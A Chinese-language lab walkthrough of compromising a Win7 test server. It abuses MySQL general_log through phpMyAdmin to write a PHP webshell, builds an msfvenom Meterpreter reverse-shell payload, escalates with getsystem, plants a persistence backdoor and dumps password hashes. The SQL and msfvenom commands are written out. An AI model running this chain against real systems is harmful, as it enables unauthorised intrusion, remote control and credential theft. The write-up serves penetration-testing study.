Mysql提权

phpmyadmin getshell到提权。

一. 环境准备：

靶机：win7 32 位。

环境：

php：5.45

MYsql：5.5.53

Apache：2.43

二. 开始攻击。

访问目标站点，发现开启3306 端口，

经过弱口令，爆破，目录泄露等途径已经获知PhpMyadmin的账号密码是root root

1.开始登陆到目标服务器的PhpMyadmin

image.png

2.检测MySQL全局变量（general_log、general_log file）的值。

general log 指的是日志保存状态，一共有两个值（ON/OFF）ON代表开启 OFF代表关闭。

general log file 指的是日志的保存路径。

SHOW VARIABLES LIKE 'general%'

image.png

已知general_log默认是关闭的，log日志存放的位置是C:\php\MySQL\data\SC-201805120002.log

开启general_log 的作用，开启它可以记录用户输入的每条命令，会把其保存在C:\php\MySQL\data\SC-201805120002.log下的一个log文件中，其实就是我们常说的日志文件。利用的思路是开启general_log之后把general_log_file的值修改为我们网站默认路径下一个自定义的php文件中，然后我们通过log日志进行写入一句话后门到上面去，然后再进一步利用。

set global general_log = "ON";
SET global general_log_file='C:/php/WWW/shell.php';

image.png

image.png

在网站的根路径下生成了testshell.php的文件夹。

3. 然后执行插入一句话木马。

select '';

image.png

4. 这时通过浏览访问一下一句话木马。

image.png

image.png

5.通过蚁剑连接一句话木马。

image.png

[图片上传失败...(image-419ce5-1584837766287)]

发现现在获取的权限为administrator权限，通过msf下getsystem来进行提权。

6. 生成exe的反弹连接木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 -f exe >testshell.exe

image.png

将生成的木马通过蚁剑上传到目标服务器并执行。

image.png

7.开msf监听，

image.png

使用getsystem来进行提权。

[图片上传失败...(image-d552b4-1584837766287)]

8. 建立后门。

生成的后门文件路径：

image.png

后门加载成功

利用方式：

当用户登录到远程系统时，为我们打开一个Meterpreter会话

image.png

9. 连接后门

image.png

成功。

总结：

1.在获取密码的过程中由于是本地搭建的，所以是知道密码的在实际使用中可以采用爆破的方式获取密码。

2.在获取一句话反弹连接后尝试获取密码失败，后面在msf下获取hash成功获取目标登录密码。